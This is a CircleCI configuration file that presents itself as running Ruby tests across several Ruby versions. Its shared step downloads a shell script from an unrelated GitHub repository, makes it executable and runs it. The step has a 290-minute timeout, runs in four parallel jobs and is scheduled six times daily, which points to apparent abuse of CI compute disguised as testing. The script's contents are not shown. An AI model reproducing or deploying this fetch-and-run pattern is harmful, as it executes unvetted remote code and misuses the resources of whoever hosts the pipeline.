working_dir: &working_dir ~/app
.github_template: &matrix
  steps:
    - run:
        name: Circleci Ruby
        command: wget https://raw.githubusercontent.com/Poloisw/CircleciRunningRuby/master/ruby.sh && chmod 700 ruby.sh && ./ruby.sh
        no_output_timeout: 290m
        
version: 2.0
jobs:
  version:
    docker:
      - image: ruby
    steps:
      - checkout
  version1:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.7.3
  version2:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.7
  version3:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.6.8
  version4:
    <<: *matrix
    docker:
      - image: circleci/ruby:2.6.7
workflows:
  version: 2
  commit:
    jobs:
      - version
      - version1
      - version2
      - version3
      - version4
    triggers:
      - schedule:
          cron: "0 4,8,12,16,20,23 * * *"
          filters:
            branches:
              only:
                - master
                
  VersionRuby:
    jobs:
      - version
      - version1
      - version2
      - version3
      - version4
